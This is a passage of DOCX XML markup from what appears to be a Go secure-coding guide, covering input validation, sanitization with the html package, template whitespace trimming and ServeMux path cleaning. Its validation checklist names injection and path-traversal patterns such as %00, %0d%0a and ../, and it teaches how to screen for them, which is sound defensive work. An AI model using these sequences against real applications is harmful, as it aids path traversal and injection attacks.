        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:tooltip="">
        <w:r>
          <w:t>DecodeLastRuneInString</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:tooltip="">
        <w:r>
          <w:t>DecodeRune</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:pStyle w:val="Para 09"/>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:tooltip="">
        <w:r>
          <w:t>DecodeRuneInString</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Note</w:t>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Forms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are treated by Go as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Maps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Other techniques to ensure the validity of the data include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Whitelisting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - whenever possible validate the input against a whitelist of allowed characters. See </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_sanitization_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Validation - Strip tags</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Boundary checking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - both data and numbers length should be verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Character escaping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - for special characters such as standalone quotation marks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Numeric validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - if input is numeric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Check for Null Bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>(%00)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Checks for new line characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>%0d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Checks forpath alteration characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text15"/>
        </w:rPr>
        <w:t>\\..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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32"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Gorilla</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - One of the most used packages for web application security. It has support for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>websockets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>cookie sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:t>, among others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Form</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - Decodes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>url.Values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into Go value(s) and Encodes Go value(s) into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>url.Values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Full </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> support.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Validator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> - Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Struct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> validation, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Cross Field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Cross Struct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as well as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Slice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> diving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="12" w:name="File_Manipulation"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>File Manipulation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any time file usage is required ( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>File Management</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section and information regarding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be found in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index7_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Error Handling</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section of the document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="13" w:name="Data_sources"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Data sources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>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4"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-system consistency checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Hash totals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>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28"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Uniqueness check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:pStyle w:val="Para 10"/>
      </w:pPr>
      <w:r>
        <w:t>Table look up check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="14" w:name="Post_validation_Actions"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Post-validation Actions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to Data Validation's best practices, the input validation is only the first part of the data validation guidelines. Therefore, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Post-validation Actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> should also be performed. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Post-validation Actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used vary with the context and are divided in three separate categories:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Enforcement Actions</w:t>
        <w:t xml:space="preserve"> Several types of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Enforcement Actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exist in order to better secure our application and data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>inform the user that submitted data has failed to comply with the requirements and therefore the data should be modified in order to comply with the required conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>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16"/>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16"/>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5" w:name="1__Before_writing_your_own_regular_expression_hav___"/>
      <w:pPr>
        <w:pStyle w:val="Para 18"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>1</w:t>
        <w:t xml:space="preserve">. Before writing your own regular expression have a look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>OWASP Validation Regex Repository</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="16" w:name="Sanitization"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>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17" w:name="Convert_single_less_than_characters___to_entity"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Convert single less-than characters </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text16"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to entity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the native package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there are two functions used for sanitization: one for escaping HTML text and another for unescaping HTML. The function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>EscapeString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, accepts a string and returns the same string with the special characters escaped. i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> becomes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Note that this function only escapes the following five characters: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Conversely there is also the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>UnescapeString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function to convert from entities to characters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="18" w:name="Strip_all_tags"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Strip all tags</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>html/template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package has a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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37"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:tooltip="">
        <w:r>
          <w:t>https://github.com/kennygrant/sanitize</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:tooltip="">
        <w:r>
          <w:t>https://github.com/maxwells/sanitize</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:pStyle w:val="Para 13"/>
      </w:pPr>
      <w:hyperlink r:id="rId55" w:tooltip="">
        <w:r>
          <w:t>https://github.com/microcosm-cc/bluemonday</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="19" w:name="Remove_line_breaks__tabs_and_extra_white_space"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Remove line breaks, tabs and extra white space</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>text/template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>html/template</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> include a way to remove whitespaces from the template, by using a minus sign </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside the action's delimiter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Executing the template with source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{{- 23}} &lt; {{45 -}}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>will lead to the following output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">23&lt;45
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>NOTE</w:t>
        <w:t xml:space="preserve">: If the minus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sign is not placed immediately after the opening action delimiter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or before the closing action delimiter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the minus sign </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be applied to the value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Template source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{{ -3 }}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>leads to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-3
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="20" w:name="URL_request_path"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>URL request path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>net/http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package there is an HTTP request multiplexer type called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> elements or repeated slashes to an equivalent, cleaner URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>A simple Mux example to illustrate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
  mux := http.NewServeMux()
  rh := http.RedirectHandler(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://yourDomain.org"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">307</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  mux.Handle(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/login"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, rh)
  log.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Listening..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
  http.ListenAndServe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":3000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, mux)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>NOTE</w:t>
        <w:t xml:space="preserve">: Keep in mind that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>ServeMux</w:t>
      </w:r>
      <w:r>
